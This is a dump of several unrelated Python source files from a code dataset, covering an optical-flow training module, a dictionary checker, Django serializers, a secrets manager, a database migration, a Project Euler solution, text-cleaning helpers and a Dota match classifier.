equal up to discretization errors\n r1 = 480 / _h\n r2 = 640 / _w\n r = (r1 + r2) / 2\n if synthetic[i]:\n self.log(\n f\"{self._mode}_render_norm_obj{obj}\",\n epe_per_object[i].float().item() / r,\n on_step=False,\n on_epoch=True,\n prog_bar=False,\n )\n self.log(\n f\"{self._mode}_render_obj{obj}\",\n epe_per_object[i].float().item(),\n on_step=False,\n on_epoch=True,\n prog_bar=False,\n )\n else:\n self.log(\n f\"{self._mode}_real_norm_obj{obj}\",\n epe_per_object[i].float().item() / r,\n on_step=False,\n on_epoch=True,\n prog_bar=False,\n )\n self.log(\n f\"{self._mode}_real_obj{obj}\",\n epe_per_object[i].float().item(),\n on_step=False,\n on_epoch=True,\n prog_bar=False,\n )\n\n self._count_real[self._mode] += (synthetic == False).sum()\n self._count_render[self._mode] += (synthetic).sum()\n\n self.log(\n f\"{self._mode}_count_real\",\n self._count_real[self._mode],\n on_step=False,\n on_epoch=True,\n prog_bar=False,\n )\n self.log(\n f\"{self._mode}_count_render\",\n self._count_render[self._mode],\n on_step=False,\n on_epoch=True,\n prog_bar=False,\n )\n\n return {\"loss\": loss, \"pred\": flow_predictions, \"target\": flow}\n\n def plot_pose(\n self,\n model_points,\n h_gt,\n h_init,\n h_pred,\n pred_valid,\n img_real_zoom,\n img_real_ori,\n K_real,\n index=0,\n ):\n if self._logged_images[self._mode] < self._logged_images_max[self._mode]:\n b = 0\n img_gt = self._visu.plot_estimated_pose(\n img=img_real_ori[b].cpu().numpy(),\n points=model_points[b].cpu(),\n H=h_gt[b].cpu(),\n K=K_real[b].cpu(),\n tag=\"Test_gt\",\n epoch=index,\n not_log=True,\n store=False,\n )\n img_pred = self._visu.plot_estimated_pose(\n img=img_real_ori[b].cpu().numpy(),\n points=model_points[b].cpu(),\n H=h_pred[b].cpu(),\n K=K_real[b].cpu(),\n tag=\"Test_pred\",\n epoch=index,\n not_log=True,\n store=False,\n )\n img_init = self._visu.plot_estimated_pose(\n img=img_real_ori[b].cpu().numpy(),\n points=model_points[b].cpu(),\n H=h_init[b].cpu(),\n K=K_real[b].cpu(),\n tag=\"Test_init\",\n not_log=True,\n store=False,\n )\n\n ass = np.concatenate([img_init, img_pred, img_gt], axis=1)\n print(ass.shape)\n self._visu.plot_image(img=ass, tag=\"Pose_INIT_PRED_GT\", epoch=index, store=False)\n\n def plot(self, flow_gt, flow_pred, img1, img2, valid, force=False):\n if self._logged_images[self._mode] < self._logged_images_max[self._mode] or force:\n\n for flow, name in zip([flow_gt, flow_pred[-1]], [\"gt\", \"pred\"]):\n corros = []\n for b in range(img1.shape[0]):\n\n i1 = img1[b].permute(1, 2, 0)\n i2 = img2[b].permute(1, 2, 0)\n va = valid[b]\n fl = flow[b].permute(1, 2, 0)\n corros.append(\n fn(\n self._visu.plot_corrospondence(\n fl[:, :, 0],\n fl[:, :, 1],\n va,\n i1,\n i2,\n colorful=True,\n text=False,\n res_h=30,\n res_w=30,\n min_points=50,\n jupyter=False,\n not_log=True,\n )\n )\n )\n\n res = torch.stack(corros).permute(0, 3, 1, 2)\n img = make_grid(res, nrow=2, padding=5)\n idx = self._logged_images[self._mode]\n\n nr = self._logged_images[self._mode] + self.trainer.current_epoch * (\n self._logged_images_max[self._mode] + 1\n )\n self._visu.plot_image(\n img=img, tag=f\"Flow_{self._mode}_{name}\", epoch=nr, store=False\n )\n self._logged_images[self._mode] += 1\n\n def plot_seg(\n self, ori_real, ori_render, pred, target, force=False, idx=None, index=0\n ):\n if self._logged_images[self._mode] < self._logged_images_max[self._mode] or force:\n BS = pred.shape[0]\n rows = int(BS ** 0.5)\n grid_target = make_grid(\n target[:, None].repeat(1, 3, 1, 1),\n nrow=rows,\n padding=2,\n scale_each=False,\n 
pad_value=2,\n )\n grid_pred = make_grid(\n pred[:, None].repeat(1, 3, 1, 1),\n nrow=rows,\n padding=2,\n scale_each=False,\n pad_value=2,\n )\n\n grid_ori_real = make_grid(\n ori_real, nrow=rows, padding=2, scale_each=False, pad_value=0\n )\n grid_ori_render = make_grid(\n ori_render, nrow=rows, padding=2, scale_each=False, pad_value=0\n )\n\n self._visu.plot_detectron(\n img=grid_ori_real,\n label=grid_pred[0, :, :],\n tag=\"PRED SEG\",\n method=\"left\",\n store=False,\n )\n self._visu.plot_image(\n img=grid_ori_render,\n tag=\"Segmentation_left_pred__right_render_img\",\n method=\"right\",\n epoch=index,\n store=False,\n )\n\n self._visu.plot_detectron(\n img=grid_ori_real,\n label=grid_pred[0, :, :],\n tag=\"PRED SEG\",\n method=\"left\",\n store=False,\n )\n self._visu.plot_detectron(\n img=grid_ori_real,\n label=grid_target[0, :, :],\n tag=\"Segmentation_left_pred__right_gt\",\n method=\"right\",\n epoch=index,\n store=False,\n )\n\n def training_step_end(self, outputs):\n # Log replay buffer stats\n self.log(\"train_loss\", outputs[\"loss\"], on_step=False, on_epoch=True, prog_bar=True)\n return {\"loss\": outputs[\"loss\"]}\n\n def validation_step(self, batch, batch_idx, dataloader_idx=0):\n return self.training_step(batch, batch_idx)\n\n def validation_step_end(self, outputs):\n self.log(\"val_loss\", outputs[\"loss\"], on_step=False, on_epoch=True, prog_bar=True)\n\n def on_validation_epoch_start(self):\n self._mode = \"val\"\n\n def validation_epoch_end(self, outputs):\n pass\n\n def configure_optimizers(self):\n if self._exp[\"optimizer\"][\"name\"] == \"ADAM\":\n optimizer = torch.optim.Adam(\n [{\"params\": self.model.parameters()}], lr=self.hparams[\"lr\"]\n )\n elif self._exp[\"optimizer\"][\"name\"] == \"SGD\":\n optimizer = torch.optim.SGD(\n [{\"params\": self.model.parameters()}],\n lr=self.hparams[\"lr\"],\n **self._exp[\"optimizer\"][\"sgd_cfg\"],\n )\n elif self._exp[\"optimizer\"][\"name\"] == \"WADAM\":\n optimizer = torch.optim.AdamW(\n self.model.parameters(),\n lr=self.hparams[\"lr\"],\n **self._exp[\"optimizer\"][\"wadam_cfg\"],\n )\n\n else:\n raise Exception(\"Optimizer name not defined\")\n\n if self._exp.get(\"lr_scheduler\", {}).get(\"active\", False):\n if self._exp[\"lr_scheduler\"][\"name\"] == \"POLY\":\n # polynomial lr-scheduler\n init_lr = self.hparams[\"lr\"]\n max_epochs = self._exp[\"lr_scheduler\"][\"poly_cfg\"][\"max_epochs\"]\n target_lr = self._exp[\"lr_scheduler\"][\"poly_cfg\"][\"target_lr\"]\n power = self._exp[\"lr_scheduler\"][\"poly_cfg\"][\"power\"]\n lambda_lr = (\n lambda epoch: (\n ((max_epochs - min(max_epochs, epoch)) / max_epochs) ** (power)\n )\n + (1 - (((max_epochs - min(max_epochs, epoch)) / max_epochs) ** (power)))\n * target_lr\n / init_lr\n )\n scheduler = torch.optim.lr_scheduler.LambdaLR(\n optimizer, lambda_lr, last_epoch=-1, verbose=True\n )\n elif self._exp[\"lr_scheduler\"][\"name\"] == \"OneCycleLR\":\n num_steps = self._exp[\"lr_scheduler\"][\"onecyclelr_cfg\"][\"num_steps\"]\n\n scheduler = torch.optim.lr_scheduler.OneCycleLR(\n optimizer,\n max_lr=self.hparams[\"lr\"],\n total_steps=num_steps + 100,\n pct_start=self._exp[\"lr_scheduler\"][\"onecyclelr_cfg\"].get(\"pct_start\", 0.05),\n cycle_momentum=False,\n anneal_strategy=\"linear\",\n )\n\n lr_scheduler = {\"scheduler\": scheduler, \"interval\": \"step\"}\n\n ret = {\"optimizer\": optimizer, \"lr_scheduler\": lr_scheduler}\n else:\n ret = [optimizer]\n return 
ret\n","sub_path":"src/flow/lightning/network.py","file_name":"network.py","file_ext":"py","file_size_in_byte":20379,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"216186160","text":"#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nCheck A0000001.txt.\r\n\"\"\"\r\n\r\nimport os\r\nimport sys\r\nimport re\r\nimport codecs\r\n\r\nimport CheckLog\r\nlog = CheckLog.get_file_log(r'checkA.log')\r\n\r\nclass DicItemA:\r\n\tdef __init__(self, s):\r\n\t\ts = s.strip()\r\n\t\tself._linestr = s\r\n\t\tpat = re.match( \\\r\n\t\t\t\tr'^(\\S+)\\t([\\w ]+)\\t(0x[\\dA-F]{4})\\t(0x[\\dA-F]{4})\\t(0x[\\dA-F]{8})$', \\\r\n\t\t\t\tself._linestr)\r\n\t\tif not pat:\r\n\t\t\tlog.warning(r' : %s : %s', self.get_father()['nextLevelId'], self.get_str())\r\n\t\t\treturn\r\n\t\tself._name = pat.group(1)\r\n\t\tself._pinyin = pat.group(2)\r\n\t\tself._minKiwiId = pat.group(3)\r\n\t\tself._maxKiwiId = pat.group(4)\r\n\t\tself._num0 = pat.group(5)\r\n\t\t\r\n\tdef get_str(self):\r\n\t\treturn self._linestr\r\n\t\r\n\tdef __getitem__(self, attr):\r\n\t\tif attr == 'name':\r\n\t\t\treturn self._name\r\n\t\telif attr == 'pinyin':\r\n\t\t\treturn self._pinyin\r\n\t\telif attr == 'minKiwiId':\r\n\t\t\treturn self._minKiwiId\r\n\t\telif attr == 'maxKiwiId':\r\n\t\t\treturn self._maxKiwiId\r\n\t\telif attr == 'num0':\r\n\t\t\treturn self._num0\r\n\t\telse:\r\n\t\t\traise KeyError()\r\n\t\t\r\n\tdef check(self):\r\n\t\t\"\"\" Check the item itself only.\r\n\t\t\"\"\"\r\n\t\tchecker = DicItemAChecker(self)\r\n\t\tr = checker.check()\r\n\t\tif not r:\r\n\t\t\tlog.warning(r' : %s', self.get_str())\r\n\t\treturn r\r\n\t\r\nclass DicItemAChecker():\r\n\tpinyinChars = set(u'abcdefghijklmnopqrstuvwxyz /1234')\r\n\t\r\n\tdef __init__(self, item):\r\n\t\tself._item = item\r\n\t\t\r\n\tdef check(self):\r\n\t\tr1 = self._check_1()\r\n\t\tr2 = self._check_2()\r\n\t\treturn r1 and r2\r\n\t\r\n\tdef _check_1(self):\r\n\t\t\"\"\"Check encoding, which is checked in function check().\r\n\t\t\"\"\"\r\n\t\treturn True\r\n\t\r\n\tdef _check_2(self):\r\n\t\t\"\"\"Check pinyin.\r\n\t\t\"\"\"\r\n\t\td = self._dicItem\r\n\t\tr1 = self._check_2_1()\r\n\t\tr2 = self._check_2_2();\r\n\t\tif not r1:\r\n\t\t\tlog.info(r' Alphabet text but not NoPinYin : %s', self._dicItem.get_str())\r\n\t\t\treturn False\r\n\t\tif not r2:\r\n\t\t\tlog.info(r' Pinyin contains other characters : %s', self._dicItem.get_str())\r\n\t\t\treturn False\r\n\t\treturn True\r\n\t\r\n\tdef _check_2_1(self):\r\n\t\t\"\"\"Check if text has alphabet, then pinyin should be \"NoPinYin\".\r\n\t\t\"\"\"\r\n\t\tdef has_alphabet(s):\r\n\t\t\tfor c in s:\r\n\t\t\t\tif c in self.alphabets:\r\n\t\t\t\t\treturn True\r\n\t\t\treturn False\r\n\t\tif has_alphabet(self._dicItem['name']):\r\n\t\t\tif self._dicItem['pinyin'] != u'NoPinYin':\r\n\t\t\t\treturn False\r\n\t\treturn True\r\n\t\r\n\tdef _check_2_2(self):\r\n\t\t\"\"\"Check characters in pinyin.\r\n\t\t\"\"\"\r\n\t\tpinyin = self._dicItem['pinyin']\r\n\t\tif pinyin == 'NoPinYin':\r\n\t\t\treturn True\r\n\t\tfor c in pinyin:\r\n\t\t\tif not c in self.pinyinChars:\r\n\t\t\t\treturn False\r\n\t\treturn True\r\n\t\r\ndef check(filename):\r\n\t\"\"\"Check records in file.\r\n\t\"\"\"\r\n\tf = codecs.open(filename, 'r', 'gbk')\r\n\ttry:\r\n\t\tls = f.readlines()\r\n\texcept:\r\n\t\tlog.info(r' Contain non-GBK character : %s', self._dicItem.get_str())\r\n\t\treturn False\r\n\trds = tuple(DicItemA(line) for line in ls)\r\n\tr = tuple(r.check() for r in rds)\r\n\treturn all(r)\r\n\r\ndef main():\r\n\tif len(sys.argv) != 2:\r\n\t\tprint('Usage:')\r\n\t\tprint(r'python check.py [Filepath of A000000.txt]')\r\n\t\tsys.exit(0)\r\n\tfilename = 
sys.argv[1]\r\n\tcheck(filename)","sub_path":"pycode/checkA.py","file_name":"checkA.py","file_ext":"py","file_size_in_byte":3042,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"480418731","text":"from django.contrib.auth import get_user_model\nfrom rest_framework import serializers\nfrom rest_framework_simplejwt.tokens import RefreshToken\nfrom core.models import Student, Professor, Institute, FieldOfStudies, Course\n\n\nclass UserRegistrationSerializer(serializers.ModelSerializer):\n \"\"\"Serializer for user registration or creation\"\"\"\n tokens = serializers.SerializerMethodField()\n\n class Meta:\n \"\"\"Meta class for User registration serializer\"\"\"\n model = get_user_model()\n fields = ('email',\n 'password',\n 'id',\n 'name',\n 'is_professor',\n 'is_student',\n 'user_image',\n 'tokens',\n 'avatar_num')\n extra_kwargs = {'password': {'write_only': True, 'min_length': 6}}\n\n def get_tokens(self, user):\n \"\"\"Returns tokens for token authentication\"\"\"\n refresh = RefreshToken.for_user(user)\n return {\n 'refresh': str(refresh),\n 'access': str(refresh.access_token),\n }\n\n\nclass UserUpdateSerializer(serializers.ModelSerializer):\n \"\"\"Serializer for user update or creation\"\"\"\n class Meta:\n \"\"\"Meta class for User update serializer without email as unique field\"\"\"\n model = get_user_model()\n fields = ('email',\n 'password',\n 'id',\n 'name',\n 'is_professor',\n 'is_student',\n 'is_university_administrator',\n 'user_image',\n 'avatar_num')\n extra_kwargs = {'password': {'write_only': True, 'min_length': 6}}\n\n\nclass PhotoUploadSerializer(serializers.ModelSerializer):\n \"\"\"Serializer for user_image upload for User model\"\"\"\n\n class Meta:\n \"\"\"Meta class for PhotoUploadSerializer\"\"\"\n model = get_user_model()\n fields = ('user_image',)\n\n\nclass GeneralUserSerializer(serializers.ModelSerializer):\n \"\"\"Serializer for getting basic User info\"\"\"\n\n class Meta:\n \"\"\"Meta class for GeneralUserSerializer\"\"\"\n model = get_user_model()\n \"\"\"Meta class for User\"\"\"\n fields = ('id', 'email', 'name')\n\n\nclass CreateUpdateStudentSerializer(serializers.ModelSerializer):\n \"\"\"Serializer for creating or updating Student\"\"\"\n class Meta:\n \"\"\"Meta class for CreateUpdateStudentSerializer\"\"\"\n model = Student\n \"\"\"Meta class for CreateStudentSerializer\"\"\"\n fields = ('id', 'field_of_studies', 'institute', 'entry_semester', 'approx_exit_semester')\n\n\nclass CreateUpdateProfessorSerializer(serializers.ModelSerializer):\n \"\"\"Serializer for creating or updating Professor\"\"\"\n\n class Meta:\n \"\"\"Meta class for CreateUpdateProfessorSerializer\"\"\"\n model = Professor\n \"\"\"Meta class for CreateProfessorSerializer\"\"\"\n fields = ('id', 'field_of_studies', 'institute')\n\n\nclass InstituteSerializer(serializers.ModelSerializer):\n \"\"\"Institute model serializer\"\"\"\n\n class Meta:\n \"\"\"Meta class for Institute serializer\"\"\"\n model = Institute\n fields = ('name', 'id')\n\n\nclass FieldOfStudiesSerializer(serializers.ModelSerializer):\n \"\"\"FieldOfStudies model serializer\"\"\"\n\n class Meta:\n \"\"\"Meta class for FieldOfStudies serializer\"\"\"\n model = FieldOfStudies\n fields = ['name', 'id']\n\n\nclass CourseSerializer(serializers.ModelSerializer):\n \"\"\"Course model serializer\"\"\"\n field_of_studies = FieldOfStudiesSerializer(required=True)\n professor = CreateUpdateProfessorSerializer(required=True)\n\n class Meta:\n \"\"\"Meta class for Course serializer\"\"\"\n model = Course\n fields = ['name', 'field_of_studies', 'professor', 'id']\n\n\nclass StudentSerializerWithCourses(serializers.ModelSerializer):\n \"\"\"Serializer for getting Student with 
courses\"\"\"\n id = serializers.ReadOnlyField()\n user = UserRegistrationSerializer(required=True)\n institute = InstituteSerializer(required=True)\n field_of_studies = FieldOfStudiesSerializer(required=True)\n courses = CourseSerializer(source=\"course_set\", many=True)\n\n class Meta:\n \"\"\"Meta class for Student serializer with courses\"\"\"\n model = Student\n fields = ('id',\n 'field_of_studies',\n 'institute', 'user',\n 'entry_semester',\n 'approx_exit_semester',\n 'courses')\n\n\nclass ProfessorSerializerWithCourses(serializers.ModelSerializer):\n \"\"\"Serializer for getting Professor with courses\"\"\"\n id = serializers.ReadOnlyField()\n user = UserRegistrationSerializer(required=True)\n institute = InstituteSerializer(required=True)\n field_of_studies = FieldOfStudiesSerializer(required=True)\n taught_courses = CourseSerializer(source=\"course_set\", many=True)\n\n class Meta:\n \"\"\"Meta class for Professor serializer with courses\"\"\"\n model = Professor\n fields = ('id',\n 'field_of_studies',\n 'institute',\n 'user',\n 'taught_courses')\n","sub_path":"app/user_administration/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":5121,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"205912401","text":"# Copyright 2017 AT&T Intellectual Property. All other rights reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nfrom oslo_log import log as logging\n\nfrom deckhand.barbican import driver\nfrom deckhand.db.sqlalchemy import api as db_api\nfrom deckhand.engine import document as document_wrapper\nfrom deckhand import utils\n\nLOG = logging.getLogger(__name__)\n\nCLEARTEXT = 'cleartext'\nENCRYPTED = 'encrypted'\n\n\nclass SecretsManager(object):\n \"\"\"Internal API resource for interacting with Barbican.\n\n Currently only supports Barbican.\n \"\"\"\n\n barbican_driver = driver.BarbicanDriver()\n\n def create(self, secret_doc):\n \"\"\"Securely store secrets contained in ``secret_doc``.\n\n Ordinarily, Deckhand documents are stored directly in Deckhand's\n database. However, secret data (contained in the data section for the\n documents with the schemas enumerated below) must be stored using a\n secure storage service like Barbican.\n\n Documents with ``metadata.storagePolicy`` == \"clearText\" have their\n secrets stored directly in Deckhand.\n\n Documents with ``metadata.storagePolicy`` == \"encrypted\" are stored in\n Barbican directly. Deckhand in turn stores the reference returned\n by Barbican in Deckhand.\n\n :param secret_doc: A Deckhand document with one of the following\n schemas:\n\n * ``deckhand/Certificate/v1``\n * ``deckhand/CertificateKey/v1``\n * ``deckhand/Passphrase/v1``\n\n :returns: Dictionary representation of\n ``deckhand.db.sqlalchemy.models.DocumentSecret``.\n \"\"\"\n encryption_type = secret_doc['metadata']['storagePolicy']\n secret_type = self._get_secret_type(secret_doc['schema'])\n\n if encryption_type == ENCRYPTED:\n # Store secret_ref in database for `secret_doc`.\n kwargs = {\n 'name': secret_doc['metadata']['name'],\n 'secret_type': secret_type,\n 'payload': secret_doc['data']\n }\n resp = self.barbican_driver.create_secret(**kwargs)\n\n secret_ref = resp['secret_href']\n created_secret = {'secret': secret_ref}\n elif encryption_type == CLEARTEXT:\n created_secret = {'secret': secret_doc['data']}\n\n return created_secret\n\n def _get_secret_type(self, schema):\n \"\"\"Get the Barbican secret type based on the following mapping:\n\n ``deckhand/Certificate/v1`` => certificate\n ``deckhand/CertificateKey/v1`` => private\n ``deckhand/Passphrase/v1`` => passphrase\n\n :param schema: The document's schema.\n :returns: The value corresponding to the mapping above.\n \"\"\"\n _schema = schema.split('/')[1].lower().strip()\n if _schema == 'certificatekey':\n return 'private'\n return _schema\n\n\nclass SecretsSubstitution(object):\n \"\"\"Class for document substitution logic for YAML files.\"\"\"\n\n def __init__(self, documents):\n \"\"\"SecretSubstitution constructor.\n\n :param documents: List of YAML documents in dictionary format that are\n candidates for secret substitution. 
This class will automatically\n detect documents that require substitution; documents need not be\n filtered prior to being passed to the constructor.\n \"\"\"\n if not isinstance(documents, (list, tuple)):\n documents = [documents]\n substitute_docs = [document_wrapper.Document(d) for d in documents if\n 'substitutions' in d['metadata']]\n self.documents = substitute_docs\n\n def substitute_all(self):\n \"\"\"Substitute all documents that have a `metadata.substitutions` field.\n\n Concrete (non-abstract) documents can be used as a source of\n substitution into other documents. This substitution is\n layer-independent, a document in the region layer could insert data\n from a document in the site layer.\n\n :returns: List of fully substituted documents.\n \"\"\"\n LOG.debug('Substituting secrets for documents: %s', self.documents)\n substituted_docs = []\n\n for doc in self.documents:\n LOG.debug(\n 'Checking for substitutions in schema=%s, metadata.name=%s',\n doc.get_name(), doc.get_schema())\n for sub in doc.get_substitutions():\n src_schema = sub['src']['schema']\n src_name = sub['src']['name']\n src_path = sub['src']['path']\n if src_path == '.':\n src_path = '.secret'\n\n # TODO(fmontei): Use secrets_manager for this logic. Need to\n # check Barbican for the secret if it has been encrypted.\n src_doc = db_api.document_get(\n schema=src_schema, name=src_name, is_secret=True,\n **{'metadata.layeringDefinition.abstract': False})\n src_secret = utils.jsonpath_parse(src_doc['data'], src_path)\n\n dest_path = sub['dest']['path']\n dest_pattern = sub['dest'].get('pattern', None)\n\n LOG.debug('Substituting from schema=%s name=%s src_path=%s '\n 'into dest_path=%s, dest_pattern=%s', src_schema,\n src_name, src_path, dest_path, dest_pattern)\n substituted_data = utils.jsonpath_replace(\n doc['data'], src_secret, dest_path, dest_pattern)\n doc['data'].update(substituted_data)\n\n substituted_docs.append(doc.to_dict())\n return substituted_docs\n","sub_path":"deckhand/engine/secrets_manager.py","file_name":"secrets_manager.py","file_ext":"py","file_size_in_byte":6156,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"321115746","text":"\"\"\"Added tags\n\nRevision ID: f38564e35d62\nRevises: 7dd0f5e2bfb9\nCreate Date: 2021-03-07 18:57:26.297863\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\nfrom sqlalchemy.orm import Session\nfrom app.models import XSS\nimport json\n\n\n# revision identifiers, used by Alembic.\nrevision = \"f38564e35d62\"\ndown_revision = \"7dd0f5e2bfb9\"\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n with op.batch_alter_table(\"XSS\", schema=None) as batch_op:\n batch_op.add_column(sa.Column(\"tags\", sa.Text(), server_default=\"[]\", nullable=False))\n\n conn = op.get_bind()\n session = Session(bind=conn)\n\n for xss in session.query(XSS).all():\n xss_data = json.loads(xss.data)\n for element_name, element_value in xss_data.items():\n if element_name in [\"local_storage\", \"session_storage\", \"cookies\"]:\n if isinstance(element_value, list):\n new_data = {}\n for single_element in element_value:\n new_data.update(single_element)\n xss_data[element_name] = new_data\n xss.data = json.dumps(xss_data)\n\n xss_headers = json.loads(xss.headers)\n new_headers = {}\n if isinstance(xss_headers, list):\n for header in xss_headers:\n new_headers.update(header)\n xss.headers = json.dumps(new_headers)\n\n session.commit()\n\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n with op.batch_alter_table(\"XSS\", schema=None) as batch_op:\n batch_op.drop_column(\"tags\")\n\n # ### end Alembic commands ###\n","sub_path":"server/migrations/versions/f38564e35d62_added_tags.py","file_name":"f38564e35d62_added_tags.py","file_ext":"py","file_size_in_byte":1709,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"24238070","text":"#Starting in the top-left corner of a 2x2 grid, and only being able to move to the right and down, there are exactly 6 routes to the bottom-right corner.\n#How many such routes are there through a 20x20 grid?\nimport time\nfrom math import factorial as fact\n\n\ndef latt_paths(n=20):\n #Follows binomial(2*n, n)\n return fact(2*n) / (fact(n) ** 2)\n\ndef ans(times):\n l = []\n for k in xrange(times):\n start_t = time.time()\n z = latt_paths()\n end_t = time.time()\n time_taken = end_t - start_t\n l.append(time_taken)\n return sorted(l)\n","sub_path":"solved/und1sec/p15.py","file_name":"p15.py","file_ext":"py","file_size_in_byte":573,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"305626399","text":"import re\r\nimport yaml\r\nimport enchant\r\nfrom nltk.corpus import wordnet\r\nfrom nltk.metrics import edit_distance\r\n\r\n#Class for removing repetitive characters from a word:\r\nclass RepetitionCorrector:\r\n def __init__(self):\r\n self.repeat_regexp = re.compile(r'(\\w*)(\\w)\\2(\\w*)')\r\n self.repl = r'\\1\\2\\3'\r\n\r\n def replace(self, word):\r\n if wordnet.synsets(word):\r\n return word\r\n\r\n repl_word = self.repeat_regexp.sub(self.repl, word)\r\n\r\n if repl_word != word:\r\n return self.replace(repl_word)\r\n else:\r\n return repl_word\r\n\r\n#Class for correcting misspelled words:\r\nclass SpellingCorrector:\r\n def __init__(self, dict_name='en-US', max_dist=2):\r\n self.spell_dict = enchant.Dict(dict_name)\r\n self.max_dist = max_dist\r\n\r\n def replace(self, word):\r\n if self.spell_dict.check(word):\r\n return word\r\n\r\n suggestions = self.spell_dict.suggest(word)\r\n if suggestions and edit_distance(word, suggestions[0]) <= self.max_dist:\r\n return suggestions[0]\r\n else:\r\n return word\r\n\r\n#Class for replacing negative words with word's antonyms:\r\nclass NegationRemover:\r\n def __init__(self, fileName):\r\n self.ant_list = yaml.load(open(fileName))\r\n\r\n def remove(self, word): \r\n return self.ant_list.get(word, word)\r\n\r\n def remove_negations(self, sent):\r\n i, l = 0, len(sent)\r\n words = []\r\n while i < l: \r\n word = sent[i]\r\n if word == 'not' and i+1 < l:\r\n antonym = self.remove(sent[i+1])\r\n if antonym:\r\n words.append(antonym)\r\n i += 2\r\n continue\r\n \r\n words.append(word)\r\n i += 1\r\n \r\n return words\r\n","sub_path":"Training and Testing/prepro_lib/text_cleaner.py","file_name":"text_cleaner.py","file_ext":"py","file_size_in_byte":1547,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"208243924","text":"import datetime\r\nimport numpy as np\r\nimport pandas as pd\r\nfrom sklearn.model_selection import KFold, cross_val_score\r\nfrom sklearn.preprocessing import StandardScaler\r\nfrom sklearn.ensemble import GradientBoostingClassifier\r\nfrom sklearn.linear_model import LogisticRegression\r\n\r\npd.set_option('display.max_columns', None)\r\ndataframe = pd.read_csv('features.csv', index_col='match_id')\r\ndataframe.head()\r\ndataframe.drop([\"duration\", \"tower_status_radiant\", \"tower_status_dire\", \"barracks_status_radiant\",\r\n \"barracks_status_dire\", ], axis=1, inplace=True)\r\ncountna = len(dataframe) - dataframe.count()\r\nprint(countna[countna > 0].sort_values(ascending=False))\r\ndataframe.fillna(0, inplace=True)\r\n\r\nX_train = dataframe.drop(\"radiant_win\", axis=1)\r\ny_train = dataframe[\"radiant_win\"]\r\n\r\nCV = KFold(n_splits=5, shuffle=True, random_state=42)\r\n\r\n\r\ndef score_trees(X: pd.DataFrame, y: pd.Series) -> pd.Series:\r\n scores = {}\r\n\r\n for n_estimators in [10, 20, 30, 50]:\r\n print(f\"n_estimators={n_estimators}\")\r\n model_trees = GradientBoostingClassifier(n_estimators=n_estimators, random_state=42)\r\n\r\n start_time = datetime.datetime.now()\r\n score = cross_val_score(model_trees, X, y, cv=CV, scoring=\"roc_auc\", n_jobs=-1).mean()\r\n print(f\"Score: {score:.3f}\")\r\n print(f\"Time elapsed: {datetime.datetime.now() - start_time}\")\r\n\r\n scores[n_estimators] = score\r\n print()\r\n\r\n return pd.Series(scores)\r\n\r\n\r\nscores = score_trees(X_train, y_train)\r\n\r\nscaler = StandardScaler()\r\nX_train = pd.DataFrame(scaler.fit_transform(X_train), index=X_train.index, columns=X_train.columns)\r\n\r\n\r\ndef score_linear(X: pd.DataFrame, y: pd.Series) -> pd.Series:\r\n scores = {}\r\n\r\n for i in range(-5, 6):\r\n C = 10.0 ** i\r\n\r\n print(f\"C={C}\")\r\n model = LogisticRegression(C=C, random_state=42)\r\n\r\n start_time = datetime.datetime.now()\r\n score = cross_val_score(model, X, y, cv=CV, scoring=\"roc_auc\", n_jobs=-1).mean()\r\n print(f\"Score: {score:.3f}\")\r\n print(f\"Time elapsed: {datetime.datetime.now() - start_time}\")\r\n\r\n scores[i] = score\r\n print()\r\n\r\n return pd.Series(scores)\r\n\r\n\r\ndef best_linear_score(scores: pd.Series):\r\n best_iter = scores.sort_values(ascending=False).head(1)\r\n best_C = 10.0 ** best_iter.index[0]\r\n print(f\"best_iter.index[0] = {best_iter.index}\")\r\n best_score = best_iter.values[0]\r\n\r\n print(f\"Наилучшее значение AUC-ROC при C = {best_C:.2f} равно {best_score:.2f}.\")\r\n\r\n\r\nbest_linear_score(scores)\r\n\r\nhero_columns = [f\"r{i}_hero\" for i in range(1, 6)] + [f\"d{i}_hero\" for i in range(1, 6)]\r\ncat_columns = [\"lobby_type\"] + hero_columns\r\nX_train.drop(cat_columns, axis=1, inplace=True)\r\nscores = score_linear(X_train, y_train)\r\nbest_linear_score(scores)\r\n\r\nunique_heroes = np.unique(dataframe[hero_columns].values.ravel())\r\nN = max(unique_heroes)\r\nprint(f\"Число уникальных героев в train: {len(unique_heroes)}. 
